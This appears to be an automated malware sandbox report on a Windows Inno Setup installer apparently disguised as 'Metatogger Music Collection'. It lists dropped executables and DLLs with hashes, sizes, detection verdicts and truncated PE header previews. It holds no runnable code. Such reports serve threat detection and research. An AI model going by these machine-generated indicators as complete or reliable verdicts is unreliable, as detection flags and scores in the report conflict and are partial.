• Filename: qY7gbJZZEg.exe, Detection: malicious
• Filename: 4sFJbsYtlZ.exe, Detection: malicious
• Filename: JkzAVzO10i.exe, Detection: malicious
• Filename: 30BoW8L6li.exe, Detection: malicious
• Filename: TLjPBsFGBA.exe, Detection: malicious
• Filename: TsJIjW3BGG.exe, Detection: malicious
• Filename: TmL1QoijLY.exe, Detection: malicious
• Filename: MdDTnpwLpW.exe, Detection: malicious
• Filename: Ht3cChAW7m.exe, Detection: malicious
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):176200
                                                                          Entropy (8bit):6.647007817777345
                                                                          Encrypted:false
                                                                          SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                          MD5:6896DC57D056879F929206A0A7692A34
                                                                          SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                          SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                          SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1853204
                                                                          Entropy (8bit):7.097038847389474
                                                                          Encrypted:false
                                                                          SSDEEP:24576:lpHpU1XpkfxgVpDRpGTpbi8p/Qup0dwJewzk+xfergEEMo947gNSqeB8xivxB1Lt:lR2pUxgV1RwT/xQu6dw0wQ+xY9VF72A
                                                                          MD5:6476CEDDC8C769258E88D80A26B424D0
                                                                          SHA1:07AFEFF8B37411E77554FD40A8B9897A7E6CA1A5
                                                                          SHA-256:EB796CE1BDE0BEB3DFAC6109A9229CD946403F7D932DF8979BF44C6A18B5B6B1
                                                                          SHA-512:9A7E4103BF2FACFFCBBB81E16BCB7C5818E0888E276A2B1BA6247BA943CFFD76B9BD3EF14AB93A384854B5E47FC08B1F33F131862EDF343983D182BC3E4BB24C
                                                                          Malicious:false
                                                                          Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.^..........*...............................@..........................p..............................................L...x.......................................................................................l............................text............................... ..`.rdata...'.......0..................@..@.data...xU... ...@... ..............@....rsrc................`..............@..@_char2_......p.......P..............a...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):704282
                                                                          Entropy (8bit):6.476114986803567
                                                                          Encrypted:false
                                                                          SSDEEP:12288:dhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpO9+u1nWXExydK:o/qrQ0yVrPg37AzHqA6Zfn093NWXExyM
                                                                          MD5:4F22DFEEA2A871E85C620A3A85A06D36
                                                                          SHA1:47CBC1D887AEF7F4F1F3460967FBA4180DDA154E
                                                                          SHA-256:2D529D076A78BEC4EC6C0DAF805BD19087E01E1D9CC8E1F1107B8CCEB8D12E4F
                                                                          SHA-512:5F80087EF9A1C064AF5EAE5AC0D3BEFA75650874D2952054B040F31C6C161BD3324D084108EF1F6DEA00CFBFD55FB449A78DBDB2CE6CA150ED392C44AF20CC29
                                                                          Malicious:true
                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):125637
                                                                          Entropy (8bit):6.2640431186303145
                                                                          Encrypted:false
                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):40974
                                                                          Entropy (8bit):6.485702128133584
                                                                          Encrypted:false
                                                                          SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                          MD5:F47E78AD658B2767461EA926060BF3DD
                                                                          SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                          SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                          SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):68552
                                                                          Entropy (8bit):6.1042544770100395
                                                                          Encrypted:false
                                                                          SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                          MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                          SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                          SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                          SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):105784
                                                                          Entropy (8bit):6.258144336244945
                                                                          Encrypted:false
                                                                          SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                          MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                          SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                          SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                          SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):125637
                                                                          Entropy (8bit):6.2640431186303145
                                                                          Encrypted:false
                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):40974
                                                                          Entropy (8bit):6.485702128133584
                                                                          Encrypted:false
                                                                          SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                          MD5:F47E78AD658B2767461EA926060BF3DD
                                                                          SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                          SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                          SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):176200
                                                                          Entropy (8bit):6.647007817777345
                                                                          Encrypted:false
                                                                          SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                          MD5:6896DC57D056879F929206A0A7692A34
                                                                          SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                          SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                          SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):68552
                                                                          Entropy (8bit):6.1042544770100395
                                                                          Encrypted:false
                                                                          SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                          MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                          SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                          SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                          SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):1853204
                                                                          Entropy (8bit):7.097039022655032
                                                                          Encrypted:false
                                                                          SSDEEP:24576:MpHpU1XpkfxgVpDRpGTpbi8p/Qup0dwJewzk+xfergEEMo947gNSqeB8xivxB1Lt:MR2pUxgV1RwT/xQu6dw0wQ+xY9VF72A
                                                                          MD5:CC6DE23FFDBD2BC10F9CFD9E44659A2D
                                                                          SHA1:418C982C63DA06773421F92266BADA86761701EB
                                                                          SHA-256:B7DFAAFB460D5AB8F2F0CE0FA5F12833EAAF20AAE9A9919A5EB83743EAF4FE1A
                                                                          SHA-512:9DAC3574E65E2F172620FBAA591E464C1331479480F2F5A25ABE6FFE52A9A8544222D219E84E8C72F4334B2D18053B62DA76C8EFAE2A3F5A45CC95D9311EED8B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.^..........*...............................@..........................p..............................................L...x.......................................................................................l............................text............................... ..`.rdata...'.......0..................@..@.data...xU... ...@... ..............@....rsrc................`..............@..@_char2_......p.......P..............a...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:InnoSetup Log Metatogger Music Collection, version 0x30, 4833 bytes, 648351\user, "C:\Users\user\AppData\Local\Metatogger Music Collection"
                                                                          Category:dropped
                                                                          Size (bytes):4833
                                                                          Entropy (8bit):4.734964346980098
                                                                          Encrypted:false
                                                                          SSDEEP:96:F6dWw389HpVl42jz9k+eOIh+s4cVSQs0Ln0eosN:kdWw3kHpVPrHIhQcVSQ1n0/w
                                                                          MD5:68939F1ADEACEF1F38CDA33036CE41F6
                                                                          SHA1:58FA7896203CFD5F93A810E804024A15B7C57CFF
                                                                          SHA-256:5CB5EAAD4F0FF6066CC290499E080C7F3D7E0C570CB4475A496A71D7C3785C50
                                                                          SHA-512:E362D1B4CC6FCFA3E735C7525BAAD038B1F897F8978C963F8014B2BFC97DC4A0E900AA703E51665E953F772B2EEEFC0E8D9DFC97B721CFBD55AB2A4EC8EBA761
                                                                          Malicious:false
                                                                          Preview:Inno Setup Uninstall Log (b)....................................Metatogger Music Collection.....................................................................................................Metatogger Music Collection.....................................................................................................0...........%.................................................................................................................7...........G.......Z....648351.user9C:\Users\user\AppData\Local\Metatogger Music Collection.............1.... .....Z......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):704282
                                                                          Entropy (8bit):6.476114986803567
                                                                          Encrypted:false
                                                                          SSDEEP:12288:dhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpO9+u1nWXExydK:o/qrQ0yVrPg37AzHqA6Zfn093NWXExyM
                                                                          MD5:4F22DFEEA2A871E85C620A3A85A06D36
                                                                          SHA1:47CBC1D887AEF7F4F1F3460967FBA4180DDA154E
                                                                          SHA-256:2D529D076A78BEC4EC6C0DAF805BD19087E01E1D9CC8E1F1107B8CCEB8D12E4F
                                                                          SHA-512:5F80087EF9A1C064AF5EAE5AC0D3BEFA75650874D2952054B040F31C6C161BD3324D084108EF1F6DEA00CFBFD55FB449A78DBDB2CE6CA150ED392C44AF20CC29
                                                                          Malicious:true
                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):693760
                                                                          Entropy (8bit):6.467807457190382
                                                                          Encrypted:false
                                                                          SSDEEP:12288:lhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpO9+u1nWXExyd:A/qrQ0yVrPg37AzHqA6Zfn093NWXExyd
                                                                          MD5:8E02BC0DF97F95A1DF3FD1EEE341C73F
                                                                          SHA1:725A46C1380C1D56BCFDF2E1E69EFBABA192A1CB
                                                                          SHA-256:52823D5894E5BD513EAE0EFAC44079187A078A37D023017D37670D1381B4566D
                                                                          SHA-512:522CB11FFDC238F2FEBBCA868D52887B2C3B957EE51448488B3949F7AD7707103891FD5C80B0105FFFDEBFB7B666FADD58AFA6E0060D789DC5B1E6C652A73449
                                                                          Malicious:true
                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4096
                                                                          Entropy (8bit):4.026670007889822
                                                                          Encrypted:false
                                                                          SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                          MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                          SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                          SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                          SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2560
                                                                          Entropy (8bit):2.8818118453929262
                                                                          Encrypted:false
                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):4.058068250306624
                                                                          Encrypted:false
                                                                          SSDEEP:192:46MTeid8XO+N2RPnqkHM2rrRbwz6ln+rnbdaBlJBRJBBti94muL+Xh2IwoXAsLi2:ST6O+NwqAM+k6lnWnboZDXyRPtAsLiA
                                                                          MD5:B6F11A0AB7715F570F45900A1FE84732
                                                                          SHA1:77B1201E535445AF5EA94C1B03C0A1C34D67A77B
                                                                          SHA-256:E47DD306A9854599F02BC1B07CA6DFBD5220F8A1352FAA9616D1A327DE0BBF67
                                                                          SHA-512:78A757E67D21EB7CC95954DF15E3EEFF56113D6B40FB73F0C5F53304265CC52C79125D6F1B3655B64F9A411711B5B70F746080D708D7C222F4E65BAD64B1B771
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.X.5.6.5.6.5.6.5.7.7.6.W.%.6.6...<.=.6...8.4.6...2.4.6.Rich5.6.........................PE..L....g.E...........!.....@...0.......E.......P.......................................................................P.......P..(............................p.......................................................P...............................text..._5.......@.................. ..`.rdata.......P.......P..............@..@.data...@....`.......`..............@....reloc.......p.......p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):6144
                                                                          Entropy (8bit):4.215994423157539
                                                                          Encrypted:false
                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23312
                                                                          Entropy (8bit):4.596242908851566
                                                                          Encrypted:false
                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.994207338297064
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          File name:file.exe
                                                                          File size:2'049'145 bytes
